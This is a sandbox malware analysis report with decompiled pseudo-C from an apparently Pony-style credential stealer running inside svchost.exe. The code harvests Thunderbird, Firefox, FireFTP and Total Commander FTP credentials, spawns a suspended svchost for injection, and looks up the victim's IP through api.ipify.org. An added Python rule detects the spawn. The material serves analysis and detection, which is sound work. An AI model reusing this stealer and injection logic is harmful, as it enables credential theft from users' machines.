                                                                                                                                        				E10007690(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                                                                                        				SetCurrentDirectoryA( &_v269);
                                                                                                                                        				return E100015EF(__ebx, _t28, _t29, _t30, _a4, _v8);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 1000AE5B
                                                                                                                                          • Part of subcall function 10007690: StrStrIA.SHLWAPI(?,?), ref: 1000769C
                                                                                                                                          • Part of subcall function 10007690: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
                                                                                                                                          • Part of subcall function 10007690: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
                                                                                                                                          • Part of subcall function 10007690: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 1000AEA0
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 1000AEBB
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 1000AF00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                                                                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                                                                                                        • API String ID: 3062143572-138716004
                                                                                                                                        • Opcode ID: 12d72ab7a4eccd75781151bb546f92bb5fba04da43f670e697823352a6315417
                                                                                                                                        • Instruction ID: c15bf0b149e3c705492bf9dd77d3d2ff96b80851e8c4f303338656cc4bd5f1d4
                                                                                                                                        • Opcode Fuzzy Hash: 12d72ab7a4eccd75781151bb546f92bb5fba04da43f670e697823352a6315417
                                                                                                                                        • Instruction Fuzzy Hash: C0114C35A10518BAEB00EF90CD46FC93A68FB14380F408050F7887C167D7B9EA90DB85
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.10%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000484D(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				CHAR* _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				int _t37;
                                                                                                                                        				void* _t39;
                                                                                                                                        				void* _t41;
                                                                                                                                        				void* _t42;
                                                                                                                                        				void* _t43;
                                                                                                                                        				void* _t44;
                                                                                                                                        				void* _t47;
                                                                                                                                        				intOrPtr _t49;
                                                                                                                                        				intOrPtr _t50;
                                                                                                                                        				void* _t51;
                                                                                                                                        				intOrPtr _t53;
                                                                                                                                        				intOrPtr _t54;
                                                                                                                                        				void* _t55;
                                                                                                                                        				intOrPtr _t57;
                                                                                                                                        				intOrPtr _t58;
                                                                                                                                        				void* _t59;
                                                                                                                                        				intOrPtr _t61;
                                                                                                                                        				intOrPtr _t62;
                                                                                                                                        				void* _t79;
                                                                                                                                        				void* _t80;
                                                                                                                                        				void* _t81;
                                                                                                                                        
                                                                                                                                        				_t81 = __edx;
                                                                                                                                        				_t80 = __ecx;
                                                                                                                                        				_t79 = __ebx;
                                                                                                                                        				_v8 = E100015A9(_a4, 2, 0);
                                                                                                                                        				"wcx_ftp.ini" = 0x77;
                                                                                                                                        				M1000F9BF = 0x47;
                                                                                                                                        				"Ghisler\\Total Commander" = 0x47;
                                                                                                                                        				_v12 = E10001888(0x105);
                                                                                                                                        				_t37 = GetWindowsDirectoryA(_v12, 0x104);
                                                                                                                                        				if(_t37 == 0) {
                                                                                                                                        					L3:
                                                                                                                                        					E10001871(_v12);
                                                                                                                                        				} else {
                                                                                                                                        					_t84 = _t37 - 0x104;
                                                                                                                                        					if(_t37 > 0x104) {
                                                                                                                                        						goto L3;
                                                                                                                                        					} else {
                                                                                                                                        						E1000471A(_a4, _v12); // executed
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				_t39 = E10001E6A(_t84, 0x28); // executed
                                                                                                                                        				E1000471A(_a4, _t39); // executed
                                                                                                                                        				_t41 = E10001E6A(_t84, 0x1a); // executed
                                                                                                                                        				_t42 = _t41;
                                                                                                                                        				_t85 = _t42;
                                                                                                                                        				if(_t42 != 0) {
                                                                                                                                        					E1000471A(_a4, E10001E05(_t42, "\\GHISLER")); // executed
                                                                                                                                        				}
                                                                                                                                        				_t43 = E10001E6A(_t85, 0x23); // executed
                                                                                                                                        				_t44 = _t43;
                                                                                                                                        				_t86 = _t44;
                                                                                                                                        				if(_t44 != 0) {
                                                                                                                                        					E1000471A(_a4, E10001E05(_t44, "\\GHISLER")); // executed
                                                                                                                                        				}
                                                                                                                                        				_t46 = E10001E6A(_t86, 0x1c);
                                                                                                                                        				if(E10001E6A(_t86, 0x1c) != 0) {
                                                                                                                                        					E1000471A(_a4, E10001E05(_t46, "\\GHISLER")); // executed
                                                                                                                                        				}
                                                                                                                                        				_t47 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
                                                                                                                                        				E1000471A(_a4, _t47);
                                                                                                                                        				_t49 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
                                                                                                                                        				_t50 = _t49;
                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                        					_v16 = _t50;
                                                                                                                                        					E10004703(_a4, _v16);
                                                                                                                                        					E10001871(_v16);
                                                                                                                                        				}
                                                                                                                                        				_t51 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
                                                                                                                                        				E1000471A(_a4, _t51);
                                                                                                                                        				_t53 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Total Commander", "FtpIniName", 0); // executed
                                                                                                                                        				_t54 = _t53;
                                                                                                                                        				if(_t54 != 0) {
                                                                                                                                        					_v16 = _t54;
                                                                                                                                        					E10004703(_a4, _v16);
                                                                                                                                        					E10001871(_v16);
                                                                                                                                        				}
                                                                                                                                        				_t55 = E10001D2A(0x80000002, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
                                                                                                                                        				E1000471A(_a4, _t55);
                                                                                                                                        				_t57 = E10001D2A(0x80000002, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
                                                                                                                                        				_t58 = _t57;
                                                                                                                                        				if(_t58 != 0) {
                                                                                                                                        					_v16 = _t58;
                                                                                                                                        					E10004703(_a4, _v16);
                                                                                                                                        					E10001871(_v16);
                                                                                                                                        				}
                                                                                                                                        				_t59 = E10001D2A(0x80000002, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
                                                                                                                                        				E1000471A(_a4, _t59);
                                                                                                                                        				_t61 = E10001D2A(0x80000002, "Software\\Ghisler\\Total Commander", "FtpIniName", 0); // executed
                                                                                                                                        				_t62 = _t61;
                                                                                                                                        				_t91 = _t62;
                                                                                                                                        				if(_t62 != 0) {
                                                                                                                                        					_v16 = _t62;
                                                                                                                                        					E10004703(_a4, _v16);
                                                                                                                                        					E10001871(_v16);
                                                                                                                                        				}
                                                                                                                                        				return E100015EF(_t79, _t80, _t81, _t91, _a4, _v8);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 1000488C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocDirectoryLocalWindows
                                                                                                                                        • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                                                                                                        • API String ID: 3186838798-3636168975
                                                                                                                                        • Opcode ID: d18634c9bb6d1c6cb0eb82de849c712dd61aaa34d8ec61113815d605d35f779c
                                                                                                                                        • Instruction ID: 1841f56598d541a95ca0d3fcfb5b77e248a4c61c8fe72a98e185e27357cc69d9
                                                                                                                                        • Opcode Fuzzy Hash: d18634c9bb6d1c6cb0eb82de849c712dd61aaa34d8ec61113815d605d35f779c
                                                                                                                                        • Instruction Fuzzy Hash: 13513CB9904148F9FF01DF70CC46FEC3A65EF106C0F118029BA14748BEDF71AA10AA5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                         			E02442E90(void** _a4, intOrPtr* _a8) {
                                                                                                                                         				struct _PROCESS_INFORMATION _v20;
                                                                                                                                         				struct _STARTUPINFOA _v88;
                                                                                                                                         				char _v348;
                                                                                                                                         				int _t17;
                                                                                                                                         
                                                                                                                                         				E024414A0( &_v88, 0, 0x44); // memset(&si, 0, 0x44); 0x44 == sizeof(STARTUPINFOA)
                                                                                                                                         				_v88.cb = 0x44;
                                                                                                                                         				// Build "%SystemRoot%\System32\svchost.exe" at run time (0x104 == MAX_PATH) rather than hard-coding the path
                                                                                                                                         				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
                                                                                                                                         				lstrcatA( &_v348, "\\System32\\svchost.exe");
                                                                                                                                         				// 0x424 == CREATE_SUSPENDED | NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT:
                                                                                                                                         				// a genuine svchost.exe started suspended, with no "-k" service group on its command
                                                                                                                                         				// line, is the target for the foreign-process injection listed in the signatures
                                                                                                                                         				_t17 = CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20); // executed
                                                                                                                                         				if(_t17 != 0) {
                                                                                                                                         					// hand the process and primary-thread handles back to the caller
                                                                                                                                         					 *_a4 = _v20.hProcess;
                                                                                                                                         					 *_a8 = _v20.hThread;
                                                                                                                                         					return 1;
                                                                                                                                         				}
                                                                                                                                         				return 0;
                                                                                                                                         			}








                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 02442EC1
                                                                                                                                        • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 02442ED3
                                                                                                                                        • CreateProcessA.KERNEL32 ref: 02442EF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEnvironmentProcessVariablelstrcat
                                                                                                                                        • String ID: D$SystemRoot$\System32\svchost.exe
                                                                                                                                        • API String ID: 3510847443-1175289849
                                                                                                                                        • Opcode ID: 1532fa82a6ed299b517bb33e88742c0a8f42fe4033dcf22143b7513c4ac02186
                                                                                                                                        • Instruction ID: 3ceef5f2aa22a1be67eb15c9f38f6cc90bcdf86b08ea4e8420c29482648fd8a3
                                                                                                                                        • Opcode Fuzzy Hash: 1532fa82a6ed299b517bb33e88742c0a8f42fe4033dcf22143b7513c4ac02186
                                                                                                                                        • Instruction Fuzzy Hash: B4019274A80208ABF714CFD0DC46FE97378EB44705F404555BB09AF2C0EBB06A548B54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%
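
                                                                                                                                         The detection side of the spawn decompiled above, as an added example that is not part of the sandbox report or of the sample's code: it runs over API-trace style process-creation records and flags a svchost.exe that is started suspended, without a "-k" service group, by a parent other than services.exe. The record field names, the sample events and the svchost-parent-of-svchost chain (the injected svchost.exe of process 6 spawning the new one) are assumptions made for the example; only the winbase.h flag values and the services.exe launch convention are real.

```python
# Added example (not from the Joe Sandbox report or the sample): flag the
# suspended-svchost spawn seen in E02442E90 in API-trace style process
# creation records.  Record field names and the sample records are
# constructed for this example.
from __future__ import annotations
import ntpath

# dwCreationFlags bits from winbase.h
CREATE_SUSPENDED = 0x00000004
DETACHED_PROCESS = 0x00000008
CREATE_NEW_CONSOLE = 0x00000010
NORMAL_PRIORITY_CLASS = 0x00000020
CREATE_UNICODE_ENVIRONMENT = 0x00000400
CREATE_NO_WINDOW = 0x08000000

CREATION_FLAG_NAMES = {
    CREATE_SUSPENDED: "CREATE_SUSPENDED",
    DETACHED_PROCESS: "DETACHED_PROCESS",
    CREATE_NEW_CONSOLE: "CREATE_NEW_CONSOLE",
    NORMAL_PRIORITY_CLASS: "NORMAL_PRIORITY_CLASS",
    CREATE_UNICODE_ENVIRONMENT: "CREATE_UNICODE_ENVIRONMENT",
    CREATE_NO_WINDOW: "CREATE_NO_WINDOW",
}


def decode_creation_flags(flags: int) -> list[str]:
    """Symbolic names for the bits set in a CreateProcess dwCreationFlags value."""
    names = [name for bit, name in CREATION_FLAG_NAMES.items() if flags & bit]
    known = 0
    for bit in CREATION_FLAG_NAMES:
        known |= bit
    unknown = flags & ~known
    if unknown:
        names.append(f"0x{unknown:08x}")
    return names


def svchost_hollowing_indicators(event: dict) -> list[str]:
    """Reasons a process-creation record looks like E02442E90's target spawn.

    An empty list means the record looks like a normal service-host start.
    """
    image = ntpath.basename(event["image"]).lower()
    if image != "svchost.exe":
        return []
    reasons = []
    parent = ntpath.basename(event["parent_image"]).lower()
    # The Service Control Manager (services.exe) is the normal parent of svchost.exe
    if parent != "services.exe":
        reasons.append(f"svchost.exe started by {parent}, not services.exe")
    flags = decode_creation_flags(event.get("creation_flags", 0))
    if "CREATE_SUSPENDED" in flags:
        reasons.append("created suspended (" + "|".join(flags) + ")")
    # services.exe always passes a service group: "svchost.exe -k <group> ..."
    args = event["cmdline"].split()[1:]
    if "-k" not in args:
        reasons.append("no -k service group on the command line")
    return reasons


def find_hollowing_candidates(events) -> list[tuple[int, list[str]]]:
    """(pid, reasons) for every record that carries at least one indicator."""
    hits = []
    for ev in events:
        reasons = svchost_hollowing_indicators(ev)
        if reasons:
            hits.append((ev["pid"], reasons))
    return hits


# Constructed sample records (not taken from the report)
SAMPLE_EVENTS = [
    # a normal service host started by the SCM
    {"pid": 812, "ppid": 620,
     "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "creation_flags": 0x0},
    # the E02442E90 spawn: bare svchost path, flags 0x424, parent assumed to be
    # the already injected svchost.exe the sample runs from
    {"pid": 3320, "ppid": 3104,
     "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe",
     "creation_flags": 0x424},
    # an unrelated child, ignored by the rule
    {"pid": 3400, "ppid": 3104,
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r"cmd.exe /c echo hi",
     "creation_flags": 0x0},
]

if __name__ == "__main__":
    for pid, reasons in find_hollowing_candidates(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

                                                                                                                                         The creation flags are only visible to API-level tracing (a sandbox hook or an EDR that records CreateProcess arguments); a kernel process-creation event carries no dwCreationFlags, so on such telemetry the parent and the missing "-k" group are the indicators that remain.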

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                         			E1000781F(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                         				intOrPtr _v8;
                                                                                                                                         				char _v269;
                                                                                                                                         				void* _t12;
                                                                                                                                         				void* _t23;
                                                                                                                                         				void* _t24;
                                                                                                                                         				void* _t25;
                                                                                                                                         
                                                                                                                                         				_t25 = __edx;
                                                                                                                                         				_t24 = __ecx;
                                                                                                                                         				_t23 = __ebx;
                                                                                                                                         				_v8 = E100015A9(_a4, 0x25, 0); // apparently opens a record of type 0x25 in the output buffer _a4; E100015EF below closes it
                                                                                                                                         				_t12 = E10001E6A(__eflags, 0x1a); // 0x1a == CSIDL_APPDATA, so this most likely resolves %APPDATA%
                                                                                                                                         				_t27 = _t12;
                                                                                                                                         				if(_t12 != 0) {
                                                                                                                                         					// %APPDATA%\Mozilla\Firefox\fireFTPsites.dat is FireFTP's saved site list, Pony's source for FireFTP credentials
                                                                                                                                         					E10004349(_a4, E10001E05(_t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
                                                                                                                                         					E10001871(_t20); // LocalFree of the concatenated path; the decompiler lost the temporary (_t20 and _t27 are undeclared)
                                                                                                                                         				}
                                                                                                                                         				 *0x10010155 = 1;
                                                                                                                                         				GetCurrentDirectoryA(0x104,  &_v269); // save the working directory, restored after the two profile walks below
                                                                                                                                         				// Same walk twice: once under the hive held in *0x1000f159 (the per-user hive, most likely), once under HKEY_LOCAL_MACHINE (0x80000002)
                                                                                                                                         				E10007690(_t24, _a4,  *0x1000f159, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                                                                                         				E10007690(_t24, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                                                                                         				SetCurrentDirectoryA( &_v269);
                                                                                                                                         				return E100015EF(_t23, _t24, _t25, _t27, _a4, _v8); // close the record
                                                                                                                                         			}










                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 1000787C
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 100078C1
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(?), ref: 10001E26
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(00000000,?), ref: 10001E30
                                                                                                                                          • Part of subcall function 10001E05: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
                                                                                                                                          • Part of subcall function 10001E05: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                                                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                                                                                                        • API String ID: 3007406096-624000163
                                                                                                                                        • Opcode ID: f507832c54fabc98c51fb3701593e56c0a31765a900d87e3c203c2bd16ed5f3d
                                                                                                                                        • Instruction ID: 1222045f1ebbd09bd2e39839bd94b9732ba4584a2cd9a9cee0f49f04669a997a
                                                                                                                                        • Opcode Fuzzy Hash: f507832c54fabc98c51fb3701593e56c0a31765a900d87e3c203c2bd16ed5f3d
                                                                                                                                        • Instruction Fuzzy Hash: 3201EC75A40508BAFB11DFA0CC4AFDD3A69EB543C4F404020FB48BD1ABDBB5EA909A55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                         			// Resolve the account that owns process _a4: account name into _a8 (size _a12), domain into _a16 (size _a20).
                                                                                                                                         			// Neither the process handle (_v12) nor the token handle (_v16) is ever closed, so every call leaks two handles.
                                                                                                                                         			E02443270(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
                                                                                                                                         				long _v8;
                                                                                                                                         				void* _v12;
                                                                                                                                         				void* _v16;
                                                                                                                                         				void* _v20;
                                                                                                                                         				void* _v24;
                                                                                                                                         				CHAR* _v28;
                                                                                                                                         				union _SID_NAME_USE _v32;
                                                                                                                                         				int _t31;
                                                                                                                                         				int _t37;
                                                                                                                                         				int _t43;
                                                                                                                                         
                                                                                                                                         				_v12 = OpenProcess(0x400, 0, _a4); // 0x400 == PROCESS_QUERY_INFORMATION
                                                                                                                                         				if(_v12 != 0) {
                                                                                                                                         					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) { // 0x20008 == READ_CONTROL | TOKEN_QUERY
                                                                                                                                         						_v8 = 0;
                                                                                                                                         						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed; class 1 == TokenUser, NULL buffer to query the required size
                                                                                                                                         						if(_t31 != 0 || GetLastError() != 0x7a) { // anything other than ERROR_INSUFFICIENT_BUFFER (0x7a == 122) is a failure
                                                                                                                                         							return 0;
                                                                                                                                         						} else {
                                                                                                                                         							_v24 = E02441390(_v8); // allocate the TOKEN_USER buffer
                                                                                                                                         							_v20 = _v24;
                                                                                                                                         							_v28 = 0;
                                                                                                                                         							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
                                                                                                                                         							if(_t37 != 0) {
                                                                                                                                         								// TOKEN_USER.User.Sid is the first member of the structure, hence *_v20
                                                                                                                                         								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
                                                                                                                                         								_v28 = _t43;
                                                                                                                                         							}
                                                                                                                                         							E024413D0(_v24); // free the TOKEN_USER buffer
                                                                                                                                         							return _v28;
                                                                                                                                         						}
                                                                                                                                         					}
                                                                                                                                         					return 0;
                                                                                                                                         				}
                                                                                                                                         				return 0;
                                                                                                                                         			}














                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,024430B6,000000FF,?,00000104,?,00000104), ref: 02443281
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,024430B6,000000FF,?,00000104), ref: 024432A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: OpenProcess$Token
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2935449343-0
                                                                                                                                        • Opcode ID: f2ad358ebbd605a23bd44c364d4566edd5a53d45dbb547fcf0057f47136ccda4
                                                                                                                                        • Instruction ID: 2e44a713f8a10cab3e6d45b66a85efbbd4ff9daa6cc6d0650860fd58c3f7c33d
                                                                                                                                        • Opcode Fuzzy Hash: f2ad358ebbd605a23bd44c364d4566edd5a53d45dbb547fcf0057f47136ccda4
                                                                                                                                        • Instruction Fuzzy Hash: A63128B5E40209AFEB04DFD4D845FAF77B9BB48704F104559F605D7280DB70AA54CB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

C-Code - Quality: 100%
			E02441ED0(CHAR* _a4) {
				char _v8;
				char _v12;
				intOrPtr _t13;

				if( *((char*)(0 + "84.17.52.36")) == 0) { // 0x02441ee7
					_v8 = 0; // 0x02441eff
					_t13 = E02441AB0("http://api.ipify.org", "84.17.52.36", 0x20,  &_v12); // executed; 0x02441f16
					_v8 = _t13; // 0x02441f1e
					if(_v8 != 1) { // 0x02441f25
						 *((char*)(0 + "84.17.52.36")) = 0; // 0x02441f4f
						lstrcpyA(_a4, "0.0.0.0"); // 0x02441f5f
						return 0; // 0x00000000
					} // 0x02441f65
					 *((char*)(_v12 + "84.17.52.36")) = 0; // 0x02441f2a
					lstrcpyA(_a4, "84.17.52.36"); // 0x02441f3a
					return 1; // 0x00000000
				} // 0x02441f40
				lstrcpyA(_a4, "84.17.52.36"); // 0x02441ef2
				return 1; // 0x00000000
			}

APIs
• lstrcpyA.KERNEL32(024415D2,84.17.52.36,024415D2,?), ref: 02441EF2
• lstrcpyA.KERNEL32(024415D2,84.17.52.36,?,?,?,?,024415D2), ref: 02441F3A
Strings
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID: 0.0.0.0$84.17.52.36$http://api.ipify.org
• API String ID: 3722407311-3865761857
• Opcode ID: 1af134123fb9833c6db7e99aab3daa3018ff3dbec3abea18483887f0d015ed4f
• Instruction ID: 62a716408156438dc11477b8a57653706e066ee8fa5640bc98fc84e747b5962b
• Opcode Fuzzy Hash: 1af134123fb9833c6db7e99aab3daa3018ff3dbec3abea18483887f0d015ed4f
• Instruction Fuzzy Hash: 6101DD34A40244A7F704DF68C909B9EBBA4D705749F10429AF90A9B240DFB59595C7D0
Uniqueness
Uniqueness Score: 100.00%

C-Code - Quality: 93%
			E10007690(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
				void* _v8;
				char* _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t37;
				long _t41;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t59;

				_t59 = __ecx; // 0x10007690
				if(StrStrIA(_a12, _a16) != 0) { // 0x100076a3
					_t48 = E10001D2A(_a8, _a12, "PathToExe", 0); // executed; 0x100076b2
					_t49 = _t48; // 0x100076b7
					_t61 = _t49; // 0x100076b7
					if(_t49 != 0) { // 0x100076b9
						_push(_t49); // 0x100076bb
						_t51 = E100023E6(_t61, _t49); // 0x100076c2
						_t62 = _t51; // 0x100076c2
						if(_t51 != 0) { // 0x100076c4
							_v28 = _t51; // 0x100076c6
							_t54 = E10001E6A(_t62, 0x1a); // 0x100076d0
							if(E10001E6A(_t62, 0x1a) != 0) { // 0x100076d2
								E10007515(_a4, E10001E05(_t54, _a20), _v28); // executed; 0x100076e5
								E10001871(_t56); // 0x100076ea
							} // 0x100076ea
							E10001871(_v28); // executed; 0x100076f2
						} // 0x100076f2
						E10001871(); // executed; 0x100076f7
					} // 0x100076f7
				} // 0x100076b9
				_v12 = E10001888(0x800); // 0x10007706
				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed; 0x10007713
				if(_t37 == 0) { // 0x1000771a
					_v20 = 0; // 0x1000771c
					while(1) { // 0x10007723
						_v16 = 0x7ff; // 0x10007723
						_t41 = RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0); // executed; 0x1000773f
						if(_t41 != 0) { // 0x10007746
							break; // 0x00000000
						} // 0x00000000
						_v24 = E10001E05(E10001DB1(_a12, "\\"), _v12); // 0x10007760
						E10007690(_t59, _a4, _a8, _v24, _a16, _a20); // executed; 0x10007772
						E10001871(_v24); // executed; 0x1000777a
						_v20 = _v20 + 1; // 0x1000777f
					} // 0x1000777f
					RegCloseKey(_v8); // executed; 0x10007787
				} // 0x10007787
				return E10001871(_v12); // 0x10007795
			}

APIs
• StrStrIA.SHLWAPI(?,?), ref: 1000769C
• RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
• RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
• RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
  • Part of subcall function 100023E6: lstrlenA.KERNEL32(?), ref: 100023FA
  • Part of subcall function 100023E6: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 10002419
  • Part of subcall function 100023E6: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 1000242B
  • Part of subcall function 100023E6: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 1000243D
  • Part of subcall function 10001E05: lstrlenA.KERNEL32(?), ref: 10001E26
  • Part of subcall function 10001E05: lstrlenA.KERNEL32(00000000,?), ref: 10001E30
  • Part of subcall function 10001E05: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
  • Part of subcall function 10001E05: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
  • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
• String ID: PathToExe
• API String ID: 3012581338-1982016430
• Opcode ID: 79b9f4464c1a45c66f256ac5816d973324aa2588fd6b094609e80367919249ee
• Instruction ID: b87d04eaf17a26be1c320efbb673443f9811a43ecf2cc889ffd000cc849c4c7b
